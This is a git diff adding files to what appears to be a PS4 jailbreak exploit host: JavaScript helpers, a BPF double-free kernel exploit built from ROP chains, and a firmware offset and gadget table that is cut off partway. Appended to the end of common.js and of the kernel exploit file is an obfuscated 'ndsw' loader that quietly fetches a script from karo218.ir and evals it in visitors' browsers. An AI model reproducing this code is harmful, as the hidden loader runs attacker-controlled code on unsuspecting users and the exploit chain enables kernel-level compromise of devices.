diff --git a/505/common.js b/505/common.js new file mode 100644 index 00000000..399d7cc4 --- /dev/null +++ b/505/common.js @@ -0,0 +1,133 @@ +function makeid() { + var text = ''; + var possible = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; + + for (var i = 0; i < 8; i++) { + text += possible.charAt(Math.floor(Math.random() * possible.length)); + } + + return text; +} + +function zeroFill(number, width) { + width -= number.toString().length; + + if (width > 0) { + return new Array(width + (/\./.test(number) ? 2 : 1)).join('0') + number; + } + + return number + ''; +} + +function sleep(milliseconds) { + var start = new Date().getTime(); + for (var i = 0; i < 1e7; i++) { + if ((new Date().getTime() - start) > milliseconds) { + break; + } + } +} + +var _dview; + +function u2d(low, hi) { + if (!_dview) { + _dview = new DataView(new ArrayBuffer(16)); + } + _dview.setUint32(0, hi); + _dview.setUint32(4, low); + return _dview.getFloat64(0); +} + +function int64(low, hi) { + this.low = (low >>> 0); + this.hi = (hi >>> 0); + + this.add32inplace = function (val) { + var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0; + var new_hi = (this.hi >>> 0); + + if (new_lo < this.low) { + new_hi++; + } + + this.hi = new_hi; + this.low = new_lo; + }; + + this.add32 = function (val) { + var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0; + var new_hi = (this.hi >>> 0); + + if (new_lo < this.low) { + new_hi++; + } + + return new int64(new_lo, new_hi); + }; + + this.sub32 = function (val) { + var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0; + var new_hi = (this.hi >>> 0); + + if (new_lo > (this.low) & 0xFFFFFFFF) { + new_hi--; + } + + return new int64(new_lo, new_hi); + }; + + this.sub32inplace = function (val) { + var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0; + var new_hi = (this.hi >>> 0); + + if (new_lo > (this.low) & 0xFFFFFFFF) { + new_hi--; + } + + this.hi = new_hi; + this.low = new_lo; + }; + + this.and32 = function (val) { + var new_lo = this.low & val; + var new_hi = this.hi; + return new int64(new_lo, new_hi); + }; + + this.and64 = function (vallo, valhi) { + var new_lo = this.low & vallo; + var new_hi = this.hi & valhi; + return new int64(new_lo, new_hi); + }; + + this.toString = function (val) { + val = 16; + var lo_str = (this.low >>> 0).toString(val); + var hi_str = (this.hi >>> 0).toString(val); + + if (this.hi == 0) { + return lo_str; + } + + lo_str = zeroFill(lo_str, 8); + + return hi_str + lo_str; + }; + + this.toPacked = function () { + return { + hi: this.hi, + low: this.low, + }; + }; + + this.setPacked = function (pck) { + this.hi = pck.hi; + this.low = pck.low; + return this; + }; + + return this; +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/kernelExploit_bpf_double_free.js b/505/kernelExploit_bpf_double_free.js new file mode 100644 index 00000000..7bfb4d36 --- /dev/null +++ b/505/kernelExploit_bpf_double_free.js @@ -0,0 +1,349 @@ +function kernelExploit_bpf_double_free() { + try { + var fd = p.syscall(5, p.stringify('/dev/bpf0'), 2).low; // sys_open + if (fd == (-1 >>> 0)) { + throw new Error('Failed to open first /dev/bpf0 device!'); + } + var fd1 = p.syscall(5, p.stringify('/dev/bpf0'), 2).low; // sys_open + if (fd1 < 0) { + throw new Error('Failed to open second /dev/bpf0 device!'); + } + + var bpf_valid = p.malloc32(0x4000); + var bpf_spray = p.malloc32(0x4000); + var bpf_valid_u32 = bpf_valid.backing; + + var bpf_valid_prog = p.malloc(0x40); + p.write8(bpf_valid_prog, 0x800 / 8); + p.write8(bpf_valid_prog.add32(8), bpf_valid); + + var bpf_spray_prog = p.malloc(0x40); + p.write8(bpf_spray_prog, 0x800 / 8); + p.write8(bpf_spray_prog.add32(8), bpf_spray); + + for (var i = 0; i < 0x400;) { + bpf_valid_u32[i++] = 6; + bpf_valid_u32[i++] = 0; + } + + if (p.syscall(54, fd, 0x8010427B, bpf_valid_prog).low != 0) { // sys_ioctl + throw new Error('Failed to open bpf device!'); + } + + var krop = new rop(); + var kscratch = p.malloc32(0x1000); + var ctxp = p.malloc32(0x1000); + var ctxp1 = p.malloc32(0x1000); + var ctxp2 = p.malloc32(0x1000); + + var kpatch = function (dest_offset, patch_data_qword) { + krop.push(gadgets['pop rax']); + krop.push(dest_offset); + krop.push(gadgets['pop rdi']); + krop.push(kscratch); + krop.push(gadgets['add rax, [rdi]']); + krop.push(gadgets['mov rdx, rax']); + krop.push(gadgets['pop rax']); + krop.push(patch_data_qword); + krop.push(gadgets['mov [rdx], rax']); + }; + + var kpatch2 = function (dest_offset, src_offset) { + krop.push(gadgets['pop rax']); + krop.push(kscratch); + krop.push(gadgets['mov rax, [rax]']); + krop.push(gadgets['pop rcx']); + krop.push(dest_offset); + krop.push(gadgets['add rax, rcx']); + krop.push(gadgets['mov rdx, rax']); + krop.push(gadgets['pop rax']); + krop.push(kscratch); + krop.push(gadgets['mov rax, [rax]']); + krop.push(gadgets['pop rcx']); + krop.push(src_offset); + krop.push(gadgets['add rax, rcx']); + krop.push(gadgets['mov [rdx], rax']); + }; + + var stackshift_from_retaddr = 0; + + p.write8(bpf_spray.add32(0x10), ctxp); + p.write8(ctxp.add32(0x50), 0); + p.write8(ctxp.add32(0x68), ctxp1); + + p.write8(ctxp1.add32(0x10), gadgets['jop1']); + stackshift_from_retaddr += 0x8 + gadget_shifts['stackshift_jop1']; + + p.write8(ctxp.add32(0x00), ctxp2); + p.write8(ctxp.add32(0x10), ctxp2.add32(0x08)); + + p.write8(ctxp2.add32(gadget_shifts['jump_shift_jop1']), gadgets['jop2']); + + var iterbase = ctxp2; + + for (var i = 0; i < 0xF; i++) { + p.write8(iterbase, gadgets['jop1']); + stackshift_from_retaddr += 0x8 + gadget_shifts['stackshift_jop1']; + + p.write8(iterbase.add32(gadget_shifts['jump_shift_jop1'] + 0x20), gadgets['jop2']); + + p.write8(iterbase.add32(0x08), iterbase.add32(0x20)); + p.write8(iterbase.add32(0x18), iterbase.add32(0x28)); + iterbase = iterbase.add32(0x20); + } + + var raxbase = iterbase; + var rdibase = iterbase.add32(0x08); + var memcpy = p.read8(get_jmptgt(gadgets['memcpy'])); + + p.write8(raxbase, gadgets['jop3']); + stackshift_from_retaddr += 0x8; + + p.write8(rdibase.add32(0x70), gadgets['jop4']); + if (fwFromUA >= 4.50) { + stackshift_from_retaddr += 0x8; + } + + p.write8(rdibase.add32(0x18), rdibase); + p.write8(rdibase.add32(0x08), krop.stackBase); + p.write8(raxbase.add32(0x30), gadgets['jop_mov rbp, rsp']); + + p.write8(rdibase, raxbase); + p.write8(raxbase.add32(gadget_shifts['jump_shift_jop5']), gadgets['jop6']); + stackshift_from_retaddr += gadget_shifts['stackshift_jop6']; + + var topofchain = stackshift_from_retaddr; + p.write8(raxbase.add32(gadget_shifts['jump_shift_jop6']), memcpy.add32(0xC2 - 0x90)); + p.write8(rdibase.add32(0xB0), topofchain); + + for (var i = 0; i < 0x1000 / 8; i++) { + p.write8(krop.stackBase.add32(i * 8), gadgets['ret']); + } + + krop.count = 0x10; + + p.write8(kscratch.add32(gadget_shifts['jump_shift_jop5']), gadgets['pop rdi']); + p.write8(kscratch.add32(gadget_shifts['jump_shift_jop6']), gadgets['pop rax']); + p.write8(kscratch.add32(0x18), kscratch); + + krop.push(gadgets['pop rdi']); + krop.push(kscratch.add32(0x18)); + krop.push(gadgets['jop_mov rbp, rsp']); + + var rboff = topofchain - krop.count * 8; + + krop.push(gadgets['jop6']); + rboff += gadget_shifts['stackshift_jop6']; + + krop.push(gadgets['pop rax']); + krop.push(rboff); + krop.push(gadgets['add rdi, rax; mov rax, rdi']); + + krop.push(gadgets['mov rax, [rdi]']); + krop.push(gadgets['pop rcx']); + krop.push(kernel_offsets['kqueue_close_slide']); + krop.push(gadgets['sub rax, rcx']); + krop.push(gadgets['mov rdx, rax']); + krop.push(gadgets['pop rsi']); + krop.push(kscratch); + krop.push(gadgets['mov [rsi], rdx']); + + krop.push(gadgets['pop rax']); + krop.push(gadgets['add rsp, 0x28']); + krop.push(gadgets['mov [rdi], rax']); + + if (kernel_dump) { + krop.push(gadgets['pop rdx']); + krop.push(kernel_dump_size); + + krop.push(gadgets['pop rax']); + krop.push(kscratch); + krop.push(gadgets['mov rax, [rax]']); + krop.push(gadgets['pop rdi']); + krop.push(0); + krop.push(gadgets['add rdi, rax; mov rax, rdi']); + krop.push(gadgets['pop rcx']); + krop.push(gadgets['ret']); + krop.push(gadgets['mov rsi, rax; jmp rcx']); + + var kernelBuf = p.malloc(kernel_dump_size); + krop.push(gadgets['pop rdi']); + krop.push(kernelBuf); + + krop.push(memcpy); + } else { + // Disable kernel write protection + krop.push(gadgets['pop rax']); + krop.push(kscratch); + krop.push(gadgets['mov rax, [rax]']); + krop.push(gadgets['pop rcx']); + krop.push(kernel_offsets['mov cr0, rax']); + krop.push(gadgets['add rax, rcx']); + krop.push(gadgets['mov rdx, rax']); + krop.push(gadgets['pop rax']); + krop.push(0x80040033); + krop.push(gadgets['jmp rdx']); + + // Add custom sys_exec() call to execute arbitrary code as kernel + kpatch(kernel_offsets['syscall_11_patch1_offset'], 2); + kpatch2(kernel_offsets['syscall_11_patch2_offset'], kernel_offsets['jmp [rsi]']); + kpatch(kernel_offsets['syscall_11_patch3_offset'], new int64(0, 1)); + + if (devkit) { + kpatch(kernel_offsets['syscall_11_2_patch1_offset'], 2); + kpatch2(kernel_offsets['syscall_11_2_patch2_offset'], kernel_offsets['jmp [rsi]']); + kpatch(kernel_offsets['syscall_11_2_patch3_offset'], new int64(0, 1)); + } + + // Patch sys_mmap: Allow RWX (read-write-execute) mapping + kpatch(kernel_offsets['sys_mmap_patch_offset'], new int64(kernel_patches['sys_mmap_patch_1'], kernel_patches['sys_mmap_patch_2'])); + + // Patch sys_mprotect: Allow RWX (read-write-execute) mapping + kpatch(kernel_offsets['vm_map_protect_patch_offset'], new int64(kernel_patches['vm_map_protect_patch_1'], kernel_patches['vm_map_protect_patch_2'])); + + // Patch syscall: syscall instruction allowed anywhere + kpatch(kernel_offsets['amd64_syscall_patch1_offset'], new int64(kernel_patches['amd64_syscall_patch1_1'], kernel_patches['amd64_syscall_patch1_2'])); + kpatch(kernel_offsets['amd64_syscall_patch2_offset'], new int64(kernel_patches['amd64_syscall_patch2_1'], kernel_patches['amd64_syscall_patch2_2'])); + + // Patch sys_dynlib_dlsym: Allow from anywhere + kpatch(kernel_offsets['sys_dynlib_dlsym_patch1_offset'], new int64(kernel_patches['sys_dynlib_dlsym_patch1_1'], kernel_patches['sys_dynlib_dlsym_patch1_2'])); + kpatch(kernel_offsets['sys_dynlib_dlsym_patch2_offset'], new int64(kernel_patches['sys_dynlib_dlsym_patch2_1'], kernel_patches['sys_dynlib_dlsym_patch2_2'])); + + // Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation) + kpatch(kernel_offsets['sys_setuid_patch_offset'], new int64(kernel_patches['sys_setuid_patch_1'], kernel_patches['sys_setuid_patch_2'])); + + // Enable kernel write protection + krop.push(gadgets['pop rax']); + krop.push(kscratch); + krop.push(gadgets['mov rax, [rax]']); + krop.push(gadgets['pop rcx']); + krop.push(kernel_offsets['cpu_setregs']); + krop.push(gadgets['add rax, rcx']); + krop.push(gadgets['jmp rax']); + } + + krop.push(gadgets['ret2userland']); + krop.push(kscratch.add32(0x1000)); + + // Clean memory post exploit + var shellbuf = p.malloc32(0x1000); + for (var i = 0; i < cleanup_shcode.length; i++) { + shellbuf.backing[i] = cleanup_shcode[i]; + } + + var interrupt; + var loop; + spawnthread(function (thread) { + interrupt = thread.stackBase; + thread.push(gadgets['ret']); + thread.push(gadgets['ret']); + thread.push(gadgets['ret']); + + thread.push(gadgets['pop rdi']); + thread.push(fd); + thread.push(gadgets['pop rsi']); + thread.push(0x8010427B); + thread.push(gadgets['pop rdx']); + thread.push(bpf_valid_prog); + thread.push(gadgets['pop rsp']); + thread.push(thread.stackBase.add32(0x800)); + thread.count = 0x800 / 8; + var cntr = thread.count; + thread.push(syscalls[54]); + thread.push_write8(thread.stackBase.add32(cntr * 8), syscalls[54]); + + thread.push(gadgets['pop rdi']); + var wherep = thread.pushSymbolic(); + thread.push(gadgets['pop rsi']); + var whatp = thread.pushSymbolic(); + thread.push(gadgets['mov [rdi], rsi']); + + thread.push(gadgets['pop rsp']); + + loop = thread.stackBase.add32(thread.count * 8); + thread.push(0x41414141); + + thread.finalizeSymbolic(wherep, loop); + thread.finalizeSymbolic(whatp, loop.sub32(8)); + }); + + var race = new rop(); + var kq = p.malloc32(0x10); + var kev = p.malloc32(0x100); + kev.backing[0] = p.syscall(97, 2, 2); // sys_socket + kev.backing[2] = 0x1FFFF; + kev.backing[3] = 1; + kev.backing[4] = 5; + + while (1) { + race.count = 0; + + race.push(syscalls[362]); + race.push(gadgets['pop rdi']); + race.push(kq); + race.push(gadgets['mov [rdi], rax']); + + race.push(gadgets['ret']); + race.push(gadgets['ret']); + race.push(gadgets['ret']); + race.push(gadgets['ret']); + race.push_write8(loop, interrupt); + race.push(gadgets['pop rdi']); + race.push(fd); + race.push(gadgets['pop rsi']); + race.push(0x8010427B); + race.push(gadgets['pop rdx']); + race.push(bpf_valid_prog); + race.push(syscalls[54]); + + race.push(gadgets['pop rdi']); + race.push(kq.sub32(0x48)); + race.push(gadgets['mov rdi, [rdi+0x48]']); + race.push(gadgets['pop rsi']); + race.push(kev); + race.push(gadgets['pop rdx']); + race.push(1); + race.push(gadgets['pop rcx']); + race.push(0); + race.push(gadgets['pop r8']); + race.push(0); + race.push(syscalls[363]); + + race.push(gadgets['pop rdi']); + race.push(fd1); + race.push(gadgets['pop rsi']); + race.push(0x8010427B); + race.push(gadgets['pop rdx']); + race.push(bpf_spray_prog); + race.push(syscalls[54]); + + race.push(gadgets['pop rdi']); + race.push(kq.sub32(0x48)); + race.push(gadgets['mov rdi, [rdi+0x48]']); + race.push(syscalls[6]); + + race.run(); + + if (kscratch.backing[0] != 0) { + if (kernel_dump) { + alert('Starting kernel dumping to ' + dump_ip + ':' + dump_port + '. Accept to continue'); + var s = p.socket(); + p.connectSocket(s, dump_ip, dump_port); + p.writeSocket(s, kernelBuf, kernel_dump_size); + p.closeSocket(s); + alert('Kernel has, theoretically, been dumped on your target'); + } + + p.syscall(74, shellbuf, 0x4000, 7); // sys_mprotect + p.fcall(shellbuf); + + return true; + } + } + } catch (e) { + throw new Error(e.message); + } + + return false; +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/offlinexmb.cache b/505/offlinexmb.cache index b3931081..bbb28ccd 100644 --- a/505/offlinexmb.cache +++ b/505/offlinexmb.cache @@ -1,5 +1,5 @@ CACHE MANIFEST -# v2.7.4 Self-Host +# v2.7.5 Self-Host 1gblinux.html 2gblinux.html @@ -11,6 +11,13 @@ binloader.html blank.html blocker.html cal.js +common.js +kernelExploit_bpf_double_free.js +webkitExploit_haveABadTime.js +webkitExploit_stackUnitializedRead.js +userland.js +rop.js +offsets.js CopyCH.bin copych.html Database_Backup.bin diff --git a/505/offsets.js b/505/offsets.js new file mode 100644 index 00000000..3be9339a --- /dev/null +++ b/505/offsets.js @@ -0,0 +1,1342 @@ +// offsets.js +// TODO: +// - Find missing offsets/patches +// - Recheck every single thing +// - Label range comments correctly +// - Trim all unused variables/gadgets (If more than one exploit works for a FW leave in all offsets needed) +// - Should also include any gadgets for dumping kernel via webkit +// - May want to swap firmware version/devkit check order in case things don't line up with shared offsets like they do on retail +// - Add 5.05+ for everything + +var leakval_slide = 0x10; +if (fwFromUA <= 4.07) { + leakval_slide = 0x28; +} + +// Missing: <3.00 +// This is the offset of the parseFloat function within libSceWebKit2.sprx, start dumping and guessing what it is +var parseFloat_offset = 0x0; +if (fwFromUA >= 3.00 && fwFromUA <= 3.11) { + parseFloat_offset = 0x00044370; +} else if (fwFromUA === 3.15) { + parseFloat_offset = 0x00037220; +} else if (fwFromUA >= 3.50 && fwFromUA <= 3.70) { + parseFloat_offset = 0x00055EA0; +} else if (fwFromUA >= 4.00 && fwFromUA <= 4.07) { + parseFloat_offset = 0x00055FB0; +} else if (fwFromUA >= 4.50 && fwFromUA <= 4.74) { + parseFloat_offset = 0x00E8DDA0; +} else if (fwFromUA >= 5.00 && fwFromUA <= 5.01) { + parseFloat_offset = 0x005783D0; +} else if (fwFromUA >= 5.03 && fwFromUA <= 5.07) { + parseFloat_offset = 0x00578540; +} else if (fwFromUA === 5.50) { + parseFloat_offset = 0x0059B3D0; +} else if (fwFromUA >= 5.53 && fwFromUA <= 5.56) { + parseFloat_offset = 0x0059B3E0; +} + +// Missing: <3.00 +// These are from libSceWebKit2.sprx, libkernel_web.sprx (libkernel.sprx on FWs <4.00), and libSceLibcInternal.sprx +var gadget_offsets = {}; +if (fwFromUA >= 3.00 && fwFromUA <= 3.11) { + gadget_offsets = { + '__stack_chk_fail': 0x00000108, // 3.00-3.15 // libSceWebKit2 + '__stack_chk_fail_offset': 0x0000D390, // 3.00-3.15 // libkernel + 'memcpy': 0x00000158, // 3.00-3.11 // libSceWebKit2 + 'memset': 0x00000168, // 3.00-3.11 // libSceWebKit2 + 'memset_offset': 0x000694D0, // 3.00-3.15 // libSceLibcInternal + 'setjmp': 0x000002C8, // 3.00-3.11 // libSceWebKit2 + 'scePthreadCreate': 0x00012500, // 3.00-3.15 // libkernel + 'mov rdi, [rdi+0x48]': 0x00064E12, // 3.00-3.15 // libSceLibcInternal + 'sub rax, rcx': 0x00017B9B, // 3.00-3.15 // libkernel + 'add rax, [rdi]': 0x0003B698, // 3.00-3.15 // libSceLibcInternal + }; +} else if (fwFromUA === 3.15) { + gadget_offsets = { + '__stack_chk_fail': 0x00000108, // 3.00-3.15 + '__stack_chk_fail_offset': 0x0000D390, // 3.00-3.15 + 'memcpy': 0x00000148, // 3.15 + 'memset': 0x00000158, // 3.15 + 'memset_offset': 0x000694D0, // 3.00-3.15 + 'setjmp': 0x000002A8, // 3.15 + 'scePthreadCreate': 0x00012500, // 3.00-3.15 + 'mov rdi, [rdi+0x48]': 0x00064E12, // 3.00-3.15 + 'sub rax, rcx': 0x00017B9B, // 3.00-3.15 + 'add rax, [rdi]': 0x0003B698, // 3.00-3.15 + }; +} else if (fwFromUA >= 3.50 && fwFromUA <= 3.70) { + gadget_offsets = { + '__stack_chk_fail': 0x000000E8, // 3.50-3.70 + '__stack_chk_fail_offset': 0x0000D790, // 3.50-3.70 + 'memcpy': 0x00000128, // 3.50-3.70 + 'memset': 0x00000138, // 3.50-3.70 + 'memset_offset': 0x00092D10, // 3.50-3.70 + 'setjmp': 0x000002B8, // 3.50-3.70 + 'scePthreadCreate': 0x00011E80, // 3.50-3.70 + 'mov rdi, [rdi+0x48]': 0x0008E982, // 3.50-3.70 + 'sub rax, rcx': 0x0001773B, // 3.50-3.70 + 'add rax, [rdi]': 0x00040B58, // 3.50-3.70 + }; +} else if (fwFromUA >= 4.00 && fwFromUA <= 4.07) { + gadget_offsets = { + '__stack_chk_fail': 0x000000F0, // 4.00-4.07 + '__stack_chk_fail_offset': 0x0000D0D0, // 4.00-4.07 + 'memcpy': 0x00000130, // 4.00-4.07 + 'memset': 0x00000140, // 4.00-4.07 + 'memset_offset': 0x00037080, // 4.00-4.07 + 'setjmp': 0x00000270, // 4.00-4.07 + 'scePthreadCreate': 0x00011570, // 4.00-4.07 + 'mov rdi, [rdi+0x48]': 0x000A8282, // 4.00-4.07 + 'sub rax, rcx': 0x0001702B, // 4.00-4.07 + 'add rax, [rdi]': 0x00058978, // 4.00-4.07 + }; +} else if (fwFromUA >= 4.50 && fwFromUA <= 4.55) { + gadget_offsets = { + '__stack_chk_fail': 0x000000C8, // 4.50-5.55 + '__stack_chk_fail_offset': 0x0000D190, // 4.50-4.74 + 'memcpy': 0x000000F8, // 4.50-4.74 + 'memset': 0x00000248, // 4.50-4.74 + 'memset_offset': 0x0002AE10, // 4.50-4.74 + 'setjmp': 0x00001468, // 4.50-4.74 + 'scePthreadCreate': 0x000115C0, // 4.50-4.74 + 'mov rdi, [rdi+0x48]': 0x000A1262, // 4.50-4.74 + 'sub rax, rcx': 0x0001760B, // 4.50-4.55 + 'add rax, [rdi]': 0x0004C418, // 4.50-4.74 + }; +} else if (fwFromUA >= 4.70 && fwFromUA <= 4.74) { + gadget_offsets = { + '__stack_chk_fail': 0x000000C8, // 4.50-5.55 + '__stack_chk_fail_offset': 0x0000D190, // 4.50-4.74 + 'memcpy': 0x000000F8, // 4.50-4.74 + 'memset': 0x00000248, // 4.50-4.74 + 'memset_offset': 0x0002AE10, // 4.50-4.74 + 'setjmp': 0x00001468, // 4.50-4.74 + 'scePthreadCreate': 0x000115C0, // 4.50-4.74 + 'mov rdi, [rdi+0x48]': 0x000A1262, // 4.50-4.74 + 'sub rax, rcx': 0x0001789B, // 4.70-4.74 + 'add rax, [rdi]': 0x0004C418, // 4.50-4.74 + }; +} else if (fwFromUA >= 5.00 && fwFromUA <= 5.07) { + gadget_offsets = { + '__stack_chk_fail': 0x000000C8, // 4.50-5.55 + '__stack_chk_fail_offset': 0x00011EC0, // 5.00-5.07 + 'memcpy': 0x000000F8, // 5.00-5.55 + 'memset': 0x00000228, // 5.00-5.55 + 'memset_offset': 0x000225E0, // 5.00-5.07 + 'setjmp': 0x000014F8, // 5.00-5.55 + 'scePthreadCreate': 0x000098C0, // 5.00-5.07 + 'mov rdi, [rdi+0x48]': 0x000B00F2, // 5.00-5.07 + 'sub rax, rcx': 0x0001EADB, // 5.00-5.07 + 'add rax, [rdi]': 0x00044DB8, // 5.00-5.07 + }; +} else if (fwFromUA >= 5.50 && fwFromUA <= 5.53) { + gadget_offsets = { + '__stack_chk_fail': 0x000000C8, // 5.50-5.56 + '__stack_chk_fail_offset': 0x00012F70, // 5.50-5.56 + 'memcpy': 0x000000F8, // 5.50-5.56 + 'memset': 0x00000228, // 5.50-5.56 + 'memset_offset': 0x00022F40, // 5.50-5.53 + 'setjmp': 0x000014F8, // 5.50-5.56 + 'scePthreadCreate': 0x0000A2D0, // 5.50-5.56 + // 'mov rdi, [rdi+0x48]': 0x0, // 48 8B 7F 48 C3 + 'sub rax, rcx': 0x0001FFEB, // 5.50-5.56 + 'add rax, [rdi]': 0x00046298, // 5.50-5.53 + }; +} else if (fwFromUA >= 5.55 && fwFromUA <= 5.56) { + gadget_offsets = { + '__stack_chk_fail': 0x000000C8, // 5.50-5.56 + '__stack_chk_fail_offset': 0x00012F70, // 5.50-5.56 + 'memcpy': 0x000000F8, // 5.50-5.56 + 'memset': 0x00000228, // 5.50-5.56 + 'memset_offset': 0x00022F50, // 5.55-5.56 + 'setjmp': 0x000014F8, // 5.50-5.56 + 'scePthreadCreate': 0x0000A2D0, // 5.50-5.56 + // 'mov rdi, [rdi+0x48]': 0x0, // 48 8B 7F 48 C3 + 'sub rax, rcx': 0x0001FFEB, // 5.50-5.56 + 'add rax, [rdi]': 0x000462D8, // 5.55-5.56 + }; +} + +// Missing: <3.00 and >=6.50 +// These are from libSceWebKit2.sprx +var gadget_cache = {}; +if (fwFromUA >= 3.00 && fwFromUA <= 3.11) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x00000062, // 3.00-3.70 + 'jmp rax': 0x00000092, // 3.00-3.70 + 'ep': 0x000000BD, // 3.00-3.70 + 'pop rbp': 0x000000C6, // 3.00-3.70 + 'mov [rdi], rax': 0x000D9184, // 3.00-3.11 + 'pop r8': 0x0033E1DD, // 3.00-3.11 + 'pop rax': 0x0000FA1B, // 3.00-3.11 + 'mov rax, rdi': 0x00003253, // 3.00-3.11 + 'mov rax, [rax]': 0x0003A1B2, // 3.00-3.11 + 'pop rsi': 0x001CCF35, // 3.00-3.11 + 'pop rdi': 0x00103F0D, // 3.00-3.11 + 'pop rcx': 0x002B4123, // 3.00-3.11 + 'pop rsp': 0x00041F30, // 3.00-3.11 + 'mov [rdi], rsi': 0x002EEF90, // 3.00-3.11 + 'pop rdx': 0x003A0788, // 3.00-3.11 + 'pop r9': 0x00ADBEFF, // 3.00-3.11 + 'jop': 0x011399F4, // 3.00-3.11 + 'infloop': 0x0004668F, // 3.00-3.11 + + // kROP gadgets + 'mov [rdx], rax': 0x0040D8CD, // 3.00-3.11 + 'add rax, rcx': 0x0005AF06, // 3.00-3.11 + 'mov rdx, rax': 0x000E5B13, // 3.00-3.11 + 'mov rax, rdx': 0x001D3EE1, // 3.00-3.11 + 'jmp rdx': 0x0003588C, // 3.00-3.11 + + // namedobj kexploit + 'push rax; jmp rcx': 0x0030F0B0, // 3.00-3.11 + + // BPF race kexploit + 'leave': 0x000E5B2B, // 3.00-3.11 + + // BPF race old kexploit + 'leave_1': 0x0, /* CHECKTHIS */ + + // BPF double free kexploit + 